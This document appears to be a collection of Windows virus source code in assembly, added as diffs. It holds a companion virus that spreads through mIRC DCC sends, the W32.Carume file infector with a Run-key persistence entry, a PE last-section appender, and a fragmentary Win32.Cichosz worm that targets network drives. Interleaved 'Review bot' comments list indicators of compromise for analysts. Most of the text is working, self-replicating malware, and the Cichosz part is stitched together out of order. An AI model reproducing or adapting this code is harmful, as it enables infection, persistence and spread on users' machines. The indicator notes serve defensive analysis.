extrn GetModuleFileNameA:proc
extrn FindFirstFileA:proc
extrn FindNextFileA:proc
extrn CopyFileA:proc
extrn DeleteFileA:proc
extrn MoveFileA:proc
extrn _lopen:proc
extrn _lwrite:proc
extrn _lclose:proc
extrn WinExec:proc
extrn SetFilePointer:proc
extrn GetCurrentDirectoryA:proc
extrn SetCurrentDirectory:proc
extrn _lread:proc
extrn _lcreat:proc
extrn SetCurrentDirectoryA:proc; Declaramos todas las funciones que vayamos a usar
;=============================
include windows.inc
;=============================
_off_ equ 2722d
_scrpt_ equ offset end_script - offset IniData1 ;Declaramos el tamaño del Script.ini
;=============================
begin:
push 00000001 ;modo de ejecucion
push offset cFileName ;nombre del .vxe el cual se guarda en el exe al momento
call WinExec ; de la infeccion
push offset path3 ;Buffer en donde guaradar el Path
push 260 ;Tamaño del buffer
call GetCurrentDirectoryA ;Obtiene el path del programa
push 25 ;Tamaño del buffer
push offset path2 ;Buffer en donde guaradar el Path
call GetWindowsDirectoryA ;obtiene el path de windows
push offset path2
call SetCurrentDirectoryA ;el directorio ahora es el de windows
push offset handle1
call GetModuleHandleA ;obtiene el handle del modulo de la fila que se esta ejecutando
push 50 ;Tamaño del buffer
push offset handle2 ;buffer
push eax ;handle del ejecutable que acabmos de obtener con la funcion anterior
call GetModuleFileNameA ;guardamos el path de este ejcutable en handle2
push offset filedta ;estructura que recibe informacion acerca de los archivos encontrados
push offset maska ; = *.Exe
call FindFirstFileA ;funcion de buscar archivos
mov dword ptr [handle_],eax ;guarda el hadle de la busqueda en _handle
cmp eax, 0 ;si la funcion devolvio un 0 hubo un error o sea que no
je done_this ;hay EXEs para infectar .
check:
; cmp nFileSizeLow, 6000d
; jle nextfile
mov bx, word ptr[cFileName] ;mueve el nombre del archivo encontrado a bx
cmp bx, 'XE' ;mira a ver si empieza por Ex , para no infectar el explorer
je nextfile ;si empieza por ex va por el proximo archivo
cmp bx, 'UR' ;mira a ver si empieza por Ru , para no infectar el RunDllxx
je nextfile ;si empieza por ex va por el proximo archivo
cmp bx, 'ur' ;lo mismo
je nextfile ;igual
cmp bx, 'ME' ;Em , para no infectar el Emm386.Exe
je nextfile ;no lo infecta
lea esi, [cFileName] ;pone en Esi el nombre del file
lea edi, [newfilename] ;pone en edi un buffer para guardar el nombre del nuevo file
stowit:
lodsb ;mueve un byte de esi a Al
cmp al, '.' ;lo compara con el punto
je addext ; si ya encontramos el punto vamos a la rutina addext
stosb ;mueve el byte an al a Edi
jmp stowit ;hace un loop hasta encontrar el punto
addext:
stosb ;mueve el "." a Edi
lea esi, [newext] ;pone en esi la extension vxe
movsw ;mueve el contenido de Esi (vxe) a Edi
movsw ;mueve el contenido de Esi (vxe) a Edi
push 0 ;Flags
push offset newfilename ;nombre con la extension .Vxe
push offset cFileName ;nombre con la extension .Exe
call MoveFileA ;convierte el .exe a . vxe
push 0 ;Flag
push offset cFileName ;nombre del .exe
push offset handle2 ;nombre del virus que se esta ejecutando
call CopyFileA ;con esta funcion copiamos este virus con el antiguo nombre del .exe
push 2 ;Write_Mode
push offset cFileName ;abrimos el .exe "infectado"
call _lopen ;Oopen file
mov dword ptr [_handle],eax ;guarda el handle del archivo abierto
push dword 0 ;how to move ; desde el file begin
push NULL
push _off_ ;offset a donde mover el puntero del file
push eax ;handle del file
call SetFilePointer ;movemos el puntero a la posicion donde se escribira el nombre del
;.vxe
mov eax, dword ptr [_handle] ;mueve el handle a Eax
push 50 ;numero de byes a escribir
push offset newfilename ;bytes que vamos a escribir
push eax ;handle del file a escribir
call _lwrite ;de esta forma si por ejemplo infectamos write.exe , en el nuevo write.exe
;se guardara el nombre write.vxe para luego ejecutarlo
push eax ;handle del archivo
call _lclose ;close the file
nextfile:
push offset filedta ;estructura donde guardar la informacion de los archivos encontrados
mov eax, dword ptr [handle_] ;handle de la primera busqueda
push eax
call FindNextFileA ;buscamos el sigueiente exe
cmp eax, 0 ;si no hay mas files
je done_this :saltamos a done_this
jmp check
done_this:
push 25 ;tamaño del buffer
push offset path1 ;buffer donde guardar
call GetSystemDirectoryA ; el directorio system ("C:\Windows\System\")
push offset handle3 ;cadena que contiene "\FlyingButterflies.scr"
push offset path1 ;path de system
call lstrcat ;juntamos las dos cadenas
push 0 ;flag
push offset path1 ;nombre que se obtuvo en la funcion anterior
push offset handle2 ;nombre de este file ("e.g:Virus.Exe")
call CopyFileA ;movemos el virus al dir. system para mandarlo con Mirc
push 2 ;flag
push offset MircLNK ;nombre del acceso directo de mirc
call _lopen :lo abrimos
mov dword ptr [_handle],eax ;handle de mirc.lnk en Eax
push dword 2
push NULL
push -50
push eax
call SetFilePointer ;nos movemos al offset -50 para ver el path de mirc
mov eax, dword ptr [_handle]
push 50
push offset MircDir
push eax
call _lread ;leemos 50 bytes en donde debe estar el path de mirc
push eax
call _lclose ;cerramos el acceso directo
std
lea esi, MircIni ;ponemos en Esi el path de mirc
get_next_byte:
lodsb ;movemos un byte de esi a al
cmp al, ':' ;vemos si ya encontramos los dos puntos
jne get_next_byte ;loop
push offset MircIni ; = \script.ini
push esi ;path del mirc
call lstrcat ;juntamos los dos
push 0 ;flag
push esi ;nombre del archivo script.ini
call _lcreate ;creamos o sobreescribimos el file
push _scrpt_ ;numero de bytes a escribir
push offset IniData1 ;contenido del script.ini
push eax ;handle del archivo creado
call _lwrite ;escribimos el archivo
push eax ;handle
call _lclose ;cerramos el archivo
push offset path3 ;Path original
call SetCurrentDirectoryA ;restauramos el path del principio
push 0
call ExitProcess ; y terminamos
;=============================
.data
handle1 db 50 dup(0)
handle2 db 50 dup(0)
maska db '*.exe',0
newext db 'vxe',0
handle_ dd 0
_handle dd 0
filedta:
FileAttributes dd 0
CreationTime db 8 dup(0)
LastAccessTime db 8 dup(0)
LastWriteTime db 8 dup(0)
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved0 dd 0
dwReserved1 dd 0
cFileName db 50 dup('N')
cAltFileName db 14 dup(0)
newfilename db 50 dup(0)
path2 db 25 dup(0)
path3 db 260 dup(0)
MircLNK db 'Start Menu\Programs\mIRC\mIRC32.LNK',0
MircDir db 50 dup(0)
MircIni db '\script.ini',0
Mirc_ db 'c:\mirc\script.ini',0
IniData1:
db '[Script]',0dh,0ah
db 'n0=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }',0dh,0ah
db 'n1= /dcc send $nick '
path1 db 25 dup(0)
handle3 db '\FlyingButterflies.scr',0,'}'
db 100 dup(0)
end_script:
end begin
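Review bot: This file has no summary header and its inline comments are in Spanish, so the behaviour an analyst needs is scattered across the code rather than stated once. The constants are all on the page: `*.exe` matches are renamed to `.vxe` (`newext`) and replaced by a copy of the running module (`handle2`) with the `.vxe` name written at file offset `_off_` (2722), the module is also copied into the system directory as `\FlyingButterflies.scr` (`handle3`), and mIRC's `script.ini` is overwritten with the `ON 1:JOIN` block at `IniData1`, which DCC-sends that `.scr` to each joining nick. I would add above `begin:` a header of the form `; Indicators: .vxe companion files, <system dir>\FlyingButterflies.scr, mIRC script.ini 'n0=ON 1:JOIN' DCC-send stanza`.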
+381
@@ -0,0 +1,381 @@
;
; W32.Carume
;
; Written by RadiatioN @ XERO VX and hacking group in February-March 2006
;
; THIS FILE HAS NO COPYRIGHTS! I AM NOT RESPONSIBLE FOR ANY DAMAGE WITH THAT CODE!
;
; Compile with masm 8.2
;
; greetings to vBx and SkyOut
;
; What does this Code?
; - Copy itself to %WINDIR%\Help\WinHelpCenter.exe
; - Adds a new registry entry for autostarting itself
; - Searches in
; %WINDIR%\ServicePackFiles\i386\
; %WINDIR%\
; %WINDIR%\system32\
; %WINDIR%\system32\dllcache\
; for file extension files like
; .exe
; .dll
; .scr
; to infect it
; - infecting file by changing the RVA entry point of the file
;
.386
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
include kernel32.inc
include advapi32.inc
includelib user32.lib
includelib kernel32.lib
includelib advapi32.lib
.data
; Directories to infect
szDirectory db "\ServicePackFiles\i386\", 0, "\", 0, "\system32\", 0, "\system32\dllcache\", 0
dwDirPos dword 0
dwDirCount dword 0
;virus name
szVirName db "W32.Carume",0
; file extensions to find
szFileExtension db ".exe", 0, ".dll", 0, ".scr", 0
dwFileExPos dword 0
dwFileExCount dword 0
; Rest of variables
szWinDir db 260 dup(0)
szDirDest db 260 dup(0)
szWildcard db '*',0
szNewDir db "\Help\WinHelpCenter.exe",0
szKey db "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0
szValueName db "WinHelpCenter",0
hSearch dword 0
dwRetVal dword 0
check dword 0
dwDamnStuff dword 0
dwStartOfPE dword 0
dwEntryPoint dword 0
dwCount dword 0
hKey dword 0
; WIN32_FIND_DATA structure
dwFileAttributes dword 0
;FILETIME structure
ftCreationTime dword 0
ftCreationTime2 dword 0
;FILETIME structure
ftLastAccessTime dword 0
ftLastAccessTime2 dword 0
;FILETIME structure
ftLastWriteTime dword 0
ftLastWriteTime2 dword 0
nFileSizeHigh dword 0
nFileSizeLow dword 0
dwReserved0 dword 0
dwReserved1 dword 0
cFileName db 260 dup(0)
cAlternateFileName db 14 dup(0)
.code
start:
;Copy File to %WINDIR%\Help\WinHelpCenter.exe
invoke GetWindowsDirectory, offset szWinDir, 260
push offset szDirDest
push offset szNewDir
push offset szWinDir
call StrCatDest
invoke GetCommandLine
push eax
call RemoveFirstLast
invoke CopyFile, eax, offset szDirDest, TRUE
invoke RegCreateKey, HKEY_LOCAL_MACHINE, offset szKey, offset hKey
invoke lstrlen, offset szDirDest
invoke RegSetValueEx, hKey, offset szValueName, 0, REG_SZ, offset szDirDest, eax
NextDir:
;go through directorys and infect the files
push offset dwDirPos
push offset szDirectory
call GetNextString
inc dwDirCount
mov esi, eax
push offset szDirDest
push esi
push offset szWinDir
call StrCatDest
push offset szDirDest
push offset szWildcard
push offset szDirDest
call StrCatDest
invoke FindFirstFile, offset szDirDest, offset dwFileAttributes
mov hSearch, eax
nextfile:
push offset dwFileExPos
push offset szFileExtension
call GetNextString
inc dwFileExCount
push eax
push offset cFileName
call InStr2
cmp eax, 1
je Infect
cmp dwFileExCount, 3
jne nextfile
jmp NoInfection
Infect:
push offset szDirDest
push esi
push offset szWinDir
call StrCatDest
push offset cFileName
push offset szDirDest
call StrCat
;File infection methods
;GENERIC_READ | GENERIC_WRITE
mov eax, 0C0000000h
;open file
invoke CreateFile, addr szDirDest, eax, FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL
mov dwRetVal, eax
;read start of PE header and add value for entry point offset
invoke SetFilePointer, dwRetVal, 03Ch, NULL, FILE_BEGIN
invoke ReadFile, dwRetVal, offset dwStartOfPE, 4, offset dwDamnStuff, NULL
add dwStartOfPE, 028h
;read entry point and a value
invoke SetFilePointer, dwRetVal, dwStartOfPE, NULL, FILE_BEGIN
invoke ReadFile, dwRetVal, offset dwEntryPoint, 4, offset dwDamnStuff, NULL
add dwEntryPoint, 210h
;write new entry point
invoke SetFilePointer, dwRetVal, -4, NULL, FILE_CURRENT
invoke WriteFile, dwRetVal, offset dwEntryPoint, 4, offset dwDamnStuff, NULL
invoke CloseHandle, dwRetVal
NoInfection:
mov dwFileExPos, 0
mov dwFileExCount, 0
invoke FindNextFile, hSearch, offset dwFileAttributes
cmp eax, 0
jnz nextfile
cmp dwDirCount, 4
jne NextDir
invoke ExitProcess, 0
;nearly equal to the C-function InStr()
InStr2:
pop ebp
pop ecx
pop check
mov edx, check
InStrLoop:
mov al, [ecx]
mov bl, [edx]
cmp al, bl
jne InStrRestore
inc edx
mov bl, [edx]
cmp bl, 0
je InStrTrue
jmp InStrResume
InStrRestore:
mov edx, check
InStrResume:
cmp al,0
je InStrFalse
cmp bl,0
je InStrFalse
inc ecx
jmp InStrLoop
InStrFalse:
mov eax, 0
push ebp
ret
InStrTrue:
mov eax, 1
push ebp
ret
;nearly equal to the c-function StrCat()
StrCat:
pop ebp
pop ecx
pop edx
StrCatLoop:
mov al, [ecx]
inc ecx
cmp al, 0
jne StrCatLoop
dec ecx
StrCatLoop2:
mov bl, [edx]
mov [ecx], bl
inc ecx
inc edx
cmp bl,0
jne StrCatLoop2
push ebp
ret
;modified function of StrCat copys destination string in the 3. argument
StrCatDest:
pop ebp
pop ebx
pop ecx
pop edx
StrCatDestLoop:
mov al, [ebx]
mov [edx], al
inc ebx
inc edx
cmp al, 0
jne StrCatDestLoop
dec ebx
dec edx
StrCatDestLoop2:
mov bl, [ecx]
mov [edx], bl
inc ecx
inc edx
cmp bl,0
jne StrCatDestLoop2
push ebp
ret
;equal to the c-function strcpy()
StrCpy:
pop ebp
pop ebx
pop ecx
StrCpyLoop:
mov al, [ebx]
mov [ecx], al
inc ecx
inc ebx
cmp al, 0
jne StrCpyLoop
push ebp
ret
;gets the next string in an array
GetNextString:
pop ebp
pop ebx
pop ecx
add ebx, [ecx]
mov al, [ecx]
cmp al, 0
jnz GetNextStringLoop
inc BYTE PTR [ecx]
mov eax, ebx
push ebp
ret
GetNextStringLoop:
mov al, [ebx]
inc ebx
inc BYTE PTR [ecx]
cmp al, 0
jnz GetNextStringLoop
push ebp
mov eax, ebx
ret
;removes the first and the last character of a string
RemoveFirstLast:
pop ebp
pop ebx
inc ebx
RemoveFirstLastLoop:
mov dl, [ebx]
dec ebx
mov [ebx], dl
inc ebx
inc ebx
cmp dl,0
jnz RemoveFirstLastLoop
dec ebx
dec ebx
dec ebx
dec ebx
xor dl, dl
mov [ebx], dl
push ebp
ret
end start
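Review bot: The header lists the persistence path and the four directories, but describes the autostart only as "a new registry entry" while the code pins it exactly: `szKey` is `SOFTWARE\Microsoft\Windows\CurrentVersion\Run` under `HKEY_LOCAL_MACHINE`, the value name is `WinHelpCenter` (`szValueName`), and the data is the `\Help\WinHelpCenter.exe` path built into `szDirDest`. Since that key/value pair and the copied path are the sample's most durable host indicators, I would extend the header bullet to `; - Adds HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinHelpCenter = %WINDIR%\Help\WinHelpCenter.exe`. It is also worth stating in the header that the `Infect` block modifies only the four-byte entry-point field (`add dwEntryPoint, 210h` written back at `FILE_CURRENT - 4`) and writes no other bytes to the target, so files in those directories are altered rather than replicated; that matters for anyone doing cleanup on a host where this ran.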
+624
@@ -0,0 +1,624 @@
;---------------------
;This is the Simple PE infection
;
;Name: lee ling chuan
;NickName:lclee_vx
;Company : Scan Associates
;Website : http://www.scan-associates.net
;Forum : http://www.prisma-mampu.gov.my/listforum.do
;the code just for research purpose
;------------------
.386p
.model flat, stdcall
option casemap:none
jumps
extrn MessageBoxA:proc
extrn ExitProcess:proc
sz_unuse equ (offset virii - offset virii_start)
MyVirusSz equ (offset virii_end - offset virii_sz)
heap_sz equ (offset heap_end - offset heap_start)
total_sz equ (MyVirusSz+heap_sz)
.data
szMessage db "this is Ring3 Virus, Just For Research Purpose", 0
szTitle db "from lclee_vx, http://www.scan-associates.net", 0
FILETIME STRUC
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
FILETIME ENDS
.code
virii_sz label byte
virii_start:
call virii
pushad
pushfd
virii:
pop ebp
mov eax, ebp
sub ebp, offset virii
sub eax, sz_unuse
sub eax, 00001000h
now_eip equ $-4
mov dword ptr [ebp+appbase],eax
mov esi, [esp+24]
xor edx, edx
call k32base
mov dword ptr [ebp+kernel], eax
lea edi, [ebp + @@offset_api]
lea esi, [esi + @@name_api]
call get_apis
call prepare_location
call start_infect
xchg ebp, ecx
jecxz SetSEH
popfd
popad
mov eax, 12345678h
org $-4
old_eip dd 00001000h
add eax, 12345678h
org $-4
appbase dd 00400000h
jmp eax
;---------------------------------
;this portion is to get the kernel32.dll address
;------------------------
k32base proc
dec esi
cmp word ptr [esi], "ZM"
jne k32base
mov edx, [esi+03ch]
cmp dword ptr [edx], "EP"
jne k32base
cmp esi, [esi+edx+34h]
jnz k32base
xchg eax, esi
ret
k32base endp
;@exit:
;ret
;------------------------------
;this portion is to get the api we want to run, :) ....excited?
;--------------------------
get_apis proc
@@step_1:
push esi
push edi
call get_api
pop edi
pop esi
xor al, al
stosd
xchg edi, esi
@@step_2:
scasb
jnz @@step_2
xchg edi, esi
@@step_3:
cmp byte ptr [esi], 0AAh
jnz @@step_1
ret
get_apis endp
get_api proc
mov edx, esi
mov edi, esi
xor al, al
@step_1: scasb
jnz @step_1
sub edi, esi
mov ecx, edi
xor eax, eax
mov esi, 3ch
add esi, [ebp+kernel]
lodsd
add eax, [ebp+kernel]
mov esi, [eax+78h]
add esi, 1ch
add esi, [ebp+kernel]
lea edi, [ebp+Address_of_func]
lodsd
add eax, [ebp+kernel]
stosd
lodsd
add eax, [ebp+kernel]
push eax
stosd
lodsd
add eax, [ebp+kernel]
stosd
pop esi
xor ebx, ebx
@step_2:
lodsd
push esi
add eax, [ebp+kernel]
mov esi, eax
mov edi, edx
push ecx
cld
rep cmpsb
pop ecx
jz @step_3
pop esi
inc ebx
jmp @step_2
@step_3: pop esi
xchg eax, ebx
shl eax, 1
add eax, dword ptr [ebp+Address_of_ordinals]
xor esi, esi
mov esi, eax
lodsd
shl eax, 2
add eax, dword ptr [ebp+Address_of_func]
mov esi, eax
lodsd
add eax, [ebp+kernel]
ret
get_api endp
;----------------
;prepare the location to scan
;--------------------
prepare_location proc
lea edi, [ebp+WinDir]
push 7Fh
push edi
call [ebp+_GetWindowsDirectoryA]
lea edi, [ebp+SysDir]
push 7Fh
push edi
call [ebp+_GetSystemDirectoryA]
lea edi, [ebp+CurrentDir]
push edi
push 7Fh
call [ebp+_GetCurrentDirectoryA]
ret
prepare_location endp
;-----------------
;let start to scan and looking for our needed file, heheheheheh :)
;---------------
start_infect:
lea edi, [ebp+location]
mov byte ptr [ebp+Mirror], 04h
set_location:
push edi
call [ebp+_SetCurrentDirectoryA]
push edi
call go_infect
pop edi
add edi, 7Fh
dec byte ptr [ebp+Mirror]
jnz set_location
ret
go_infect proc
and dword ptr [ebp+counter], 00000000h
; lea eax, [ebp+offset find_data]
lea eax, [ebp+offset WIN32_FIND_DATA]
push eax
lea eax, [ebp+offset Mark]
push eax
call [ebp+_FindFirstFileA]
inc eax
jz Fail
dec eax
mov dword ptr [ebp+SearchHandle], eax
@go_infect1: push dword ptr [ebp+old_eip]
push dword ptr [ebp+appbase]
call infect
pop dword ptr [ebp+appbase]
pop dword ptr [ebp+old_eip]
inc byte ptr [ebp+counter]
cmp dword ptr [ebp+counter], 0FFFFFFFFh
jz Fail
@go_infect2: lea edi, [ebp+WFD_szFileName]
mov ecx, max_path
xor al, al
rep stosb
; lea eax, [ebp+offset find_data]
lea eax, [ebp+offset WIN32_FIND_DATA]
push eax
push dword ptr [ebp+SearchHandle]
call [ebp+_FindNextFileA]
test eax, eax
jnz @go_infect1
endp go_infect
ClsSeachHandle:
push dword ptr [ebp+SearchHandle]
call [ebp+_FindClose]
Fail:
ret
;-------------------
;start infect. i use the "increase the last section" technic
;------------------
infect:
lea esi, [ebp+WFD_szFileName]
push 80h
push esi
call [ebp+_SetFileAttributesA]
call open_exe
inc eax
jz fail_open
dec eax
mov dword ptr [ebp+FileHandle], eax
call file_mapping
test eax, eax
jz file_close
mov dword ptr [ebp+MapHandle], eax
mov ecx, dword ptr [ebp+WFD_nFileSizeLow]
call map_view
test eax, eax
jz unmap_view
mov eax, dword ptr [ebp+MapAddress]
mov esi, [eax+3ch]
add esi, eax
cmp dword ptr [esi], "EP"
jz cant_infect
cmp dword ptr [esi+4ch], "LEE"
jz cant_infect
push dword ptr [esi+3ch]
push dword ptr [ebp+MapAddress]
call [ebp+_UnmapViewOfFile]
push dword ptr [ebp+MapHandle]
call [ebp+_CloseHandle]
pop ecx
mov eax, dword ptr [ebp+WFD_nFileSizeLow]
add eax, MyVirusSz
add eax, 1000h
call ReAlign
xchg ecx, eax
call file_mapping
test eax, eax
jz file_close
mov dword ptr [ebp+MapHandle], eax
mov ecx, dword ptr [ebp+NewFileSize]
call map_view
test eax, eax
jz unmap_view
mov dword ptr [ebp+MapAddress], eax
mov esi, [eax+3ch]
add esi, eax
mov edi, esi
mov ebx, [esi+74h]
shl ebx, 3
sub eax, eax
mov ax, word ptr [esi+6h]
dec eax
mov ecx, 28h
mul ecx
add esi, 78h
add esi, ebx
add esi, eax
mov eax, [edi+28h]
mov dword ptr [ebp+old_eip], eax
mov eax, [edi+34h]
mov dword ptr [ebp+appbase], eax
mov edx, [esi+10h]
mov ebx, edx
add edx, [esi+14h]
push edx
mov eax, ebx
add eax, [esi+0ch]
mov [edi+28h], eax
mov dword ptr [ebp+now_eip], eax
mov eax, [esi+10h]
add eax, MyVirusSz
mov ecx, [edi+3ch]
call ReAlign
mov [esi+10h], eax
mov [esi+08h], eax
pop edx
mov eax, [esi+10h]
add eax, [esi+0ch]
mov [edi+50h], eax
or dword ptr [esi+24h], 00000020h
or dword ptr [esi+24h], 20000000h
or dword ptr [esi+24h], 80000000h
mov dword ptr [edi+4ch], "LEE"
lea esi, [ebp+virii_start]
xchg edi, edx
add edi, dword ptr [ebp+MapAddress]
mov ecx, MyVirusSz
rep movsb
jmp unmap_view
;-----------------
;this portion we open the file
;----------------
open_exe proc
sub eax, eax
push eax
push eax
push 00000003h
push eax
push 00000001h
push 80000000h or 40000000h
push esi
call [ebp+_CreateFileA]
ret
open_exe endp
;-----------------------
;this portion fail to open the file, we are going to set the old file attribute
;-----------------------
fail_open proc
push dword ptr [ebp+WFD_dwFileAttributes]
lea eax, [ebp+WFD_szFileName]
push eax
call [ebp+_SetFileAttributesA]
ret
fail_open endp
;-----------------------
;map the file into memory
;----------------------
file_mapping proc
sub eax, eax
push eax
lea ecx, dword ptr [ebp+WFD_nFileSizeLow]
push ecx
push eax
push 00000004h
push eax
push dword ptr [ebp+FileHandle]
call [ebp+_CreateFileMappingA]
ret
file_mapping endp
;-----------------------
;so bad, we fail to map the file
;---------------------
file_close:
push dword ptr [ebp+FileHandle]
call [ebp+_CloseHandle]
;-----------------------
;this portion start function MapViewOfFile
;----------------------
map_view proc
push ecx
push 00000000h
push 00000000h
push 00000002h
push dword ptr [ebp+MapHandle]
call [ebp+_MapViewOfFile]
ret
map_view endp
;-----------------
;this portion for error of MapViewOfFile
;------------------------
unmap_view:
push dword ptr [ebp+MapAddress]
call [ebp+_UnmapViewOfFile]
;--------------------------
;this file cannot infect and will crash the system, we need to restore back all the variable
;--------------------------
cant_infect:
dec byte ptr [ebp+counter]
mov ecx, dword ptr [ebp+WFD_nFileSizeLow]
call original
;--------------------
;this portion is to reassembly the original file when detected failed infection
;----------------
original proc
push 00000000h
push 00000000h
push ecx
push dword ptr [ebp+FileHandle]
call [ebp+_SetFilePointer]
push dword ptr [ebp+FileHandle]
call [ebp+_SetEndOfFile]
ret
original endp
;----------------------
;align the infected PE file
;eax=file size, ecx=file alignment
;---------------
ReAlign proc
push edx
sub edx, edx
push eax
div ecx
pop eax
sub ecx,edx
add eax,ecx
pop edx
ret
ReAlign endp
;----------------
;all the variable
;-----------------
;appbase dd 00400000h
kernel dd ?
Mark db "*.EXE", 0
counter dd 00000000h
@@name_api label byte
@FindFisrtFileA db "FindFirstFileA", 0
@FindNextFileA db "FindNextFileA", 0
@FindClose db "FindClose", 0
@SetFileAttributesA db "SetFileAttributesA", 0
@CreateFileA db "CreateFileA", 0
@CreateFileMappingA db "CreateFileMappingA", 0
@CloseHandle db "CloseHandle", 0
@MapViewOfFile db "MapViewOfFile", 0
@SetFilePointer db "SetFilePointer", 0
@GetWindowsDirectoryA db "GetWindowsDirectoryA", 0
@GetSystemDirectoryA db "GetSystemDirectoryA", 0
@GetCurrentDirectoryA db "GetCurrentDirectoryA", 0
@SetCurrentDirectoryA db "SetCurrentDirectoryA", 0
@UnmapViewOfFile db "UnmapViewOfFile", 0
@SetEndOfFile db "SetEndOfFile", 0
db 0AAh
virii_end label byte
heap_start label byte
max_path equ 260
SearchHandle dd 00000000h
Address_of_func dd 00000000h
Address_of_ordinals dd 00000000h
FileHandle dd 00000000h
MapHandle dd 00000000h
MapAddress dd 00000000h
NewFileSize dd 00000000h
location label byte
WinDir db 7Fh dup (00)
SysDir db 7Fh dup (00)
CurrentDir db 7Fh dup (00)
Level db (($-location)/7Fh)
Mirror equ Level
@@offset_api label byte
_FindFirstFileA dd 00000000h
_FindNextFileA dd 00000000h
_FindClose dd 00000000h
_SetFileAttributesA dd 00000000h
_CreateFileA dd 00000000h
_CreateFileMappingA dd 00000000h
_CloseHandle dd 00000000h
_MapViewOfFile dd 00000000h
_SetFilePointer dd 00000000h
_GetWindowsDirectoryA dd 00000000h
_GetSystemDirectoryA dd 00000000h
_GetCurrentDirectoryA dd 00000000h
_SetCurrentDirectoryA dd 00000000h
_UnmapViewOfFile dd 00000000h
_SetEndOfFile dd 00000000h
WIN32_FIND_DATA label byte
WFD_dwFileAttributes DD ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh DD ?
WFD_nFileSizeLow DD ?
WFD_dwReserved0 DD ?
WFD_dwReserved1 DD ?
WFD_szFileName DB max_path DUP (?)
WFD_szAlternateFileName DB 13 DUP (?)
DB 3 DUP (?) ; dword padding
SIZEOF_WIN32_FIND_DATA EQU SIZE WIN32_FIND_DATA
heap_end label byte
;-------------
;popup the meessage
;----------------
SetSEH:
pop dword ptr fs:[0]
add esp, 4
popad
popfd
sub eax, eax
push eax
push offset szTitle
push offset szMessage
push eax
call MessageBoxA
sub eax, eax
push eax
call ExitProcess
end virii_start
;--------------------------
;Thanks, r00t, hackerboy, billy...ur tutorial wonderful.... :)
;--------------------
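Review bot: The header says only "Simple PE infection" and does not record the infection marker or scan scope, both of which are fixed in the code: a file is skipped when the dword at PE header offset 4Ch already reads `"LEE"` (`cmp dword ptr [esi+4ch], "LEE"`) and that same marker is written on infection (`mov dword ptr [edi+4ch], "LEE"`), only `*.EXE` (`Mark`) is searched, and the three locations are the Windows, System and current directories filled by `prepare_location`. The appended body goes into the last section, whose characteristics are OR-ed with `20h`, `20000000h` and `80000000h`, i.e. marked code, executable and writable. I would add under the header `; Marker: "LEE" at PE header offset 4Ch; scope: *.EXE in WinDir, SysDir, current dir; last section grown and flagged code+exec+write`. Separately, the label `@FindFisrtFileA` is misspelled; it assembles because it is only a local label, but it reads as a different import at a glance.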
+328
@@ -0,0 +1,328 @@
;============================================================
;=== Win32.Cichosz virus. Coded by Necronomikon[ShadowvX] ===
;============================================================
;Virusname: Win32.Cichosz
;Author: Necronomikon
;Date:26-12-00
;Features: - Worming: It checks all drives and if it have access to
;a network drive,it infect there some files. (thanks to SnakeByte)
; - Fuck Debuggers
; - Display MessageBox
; - Renames infected files to svx
;---------------------------------------
;--- based on Win32.3x3 by BumbleBee ---
;---------------------------------------
;======================================================
; . To compile:
;
; tasm32 /ml /m3 cichosz,,;
; tlink32 -Tpe -c cichosz,cichosz,, import32.lib
;=======================================================
.386
locals
jumps
.model flat,STDCALL
extrn ExitProcess:PROC
extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn FindClose:PROC
extrn GetCommandLineA:PROC
extrn MoveFileA:PROC
extrn CopyFileA:PROC
extrn WinExec:PROC
extrn MessageBoxA:PROC
extrn GetSystemTime:PROC
extrn CloseHandle:PROC
extrn GetFileSize:PROC
extrn GetCurrentDirectoryA:PROC
extrn SetCurrentDirectoryA:PROC
extrn DeleteFileA:PROC
L equ <LARGE>
.DATA
szTitle db "Structured Exception Handler example",0
szMessage db "Intercepted General Protection Fault!",0
.code
start:
call setupSEH ; The call pushes the offset
; past it in the stack rigth?
; So we will use that :)
exceptionhandler:
mov esp,[esp+8] ; Error gives us old ESP
; in [ESP+8]
push 00000000h ; Parameters for MessageBoxA
push offset szTitle
push offset szMessage
push 00000000h
call MessageBoxA
push 00000000h
call ExitProcess ; Exit Application
setupSEH:
push dword ptr fs:[0] ; Push original SEH handler
mov fs:[0],esp ; And put the new one (located
; after the first call)
mov ebx,0BFF70000h ; Try to write in kernel (will
mov eax,012345678h ; generate an exception)
xchg eax,[ebx]
end start
windoze db 'C:\Windows\System\Sys\Porn.exe',0
fHnd dd ? ; handle for files
shit dd 0 ; for write process
cont0 dd 0 ; for loops
cont1 db 0 ; for loops
findData db 316 dup(0) ; data for ffirst and fnext
fMask db '*.EXE' ; mask for finding exe files
ffHnd dd ? ; handle for ffirst and fnext
hostName db 260 dup(0) ; space for save host name
hwoArgs db 260 dup(0) ; host without arguments
futureHostName db 260 dup(0) ; space for save new host name
chDir db 260 dup(0) ; space for save current dir
commandLine dd ? ; handle for command line
sysTimeStruct db 16 dup(0) ; space for system time struct
; virus id and author
virusId db 'Win32.CICHOSZ coded by Necronomikon',0
; message
mess db 'This is my 1st Win32-Virus.'
db 0dh,0ah,'Greetingz tha whole ShadowvX Group!',0
bmess db 'Invalid call in shared memory 0x0cf689000.',0
;--------------------
push offset Buffer ; offset of the buffer
push 60h ; buffer-lenght
call GetLogicalDriveStrings
cmp eax, 0 ; did we fail ?
je StopThis
lea esi, Buffer
WhatDrive:
push esi
call GetDriveType
cmp eax, DRIVE_REMOTE ; we got a network drive
jne NoNetwork
; esi still contains the offset of
; the root dir on the drive
call infectDrive ; so we infect it.. ;P
NoNetwork:
Call GetNextZero ; place esi after the next zero
; ( searching from esi onwards )
cmp byte ptr [esi],0
jne WhatDrive ; if we searched all drives we
; end here, otherwise we check the type
StopThis:
ret
Buffer db 60h dup (?) ; I don't know that many ppl with 20+
; Drives so this buffersize should be
; big enough ;)
;----------------------------------------
virus:
lea eax,sysTimeStruct ; check for payload
push eax
call GetSystemTime ; get system time
lea eax,sysTimeStruct
cmp word ptr [eax+2],12
jne skipPay
cmp word ptr [eax+6],14
jne skipPay
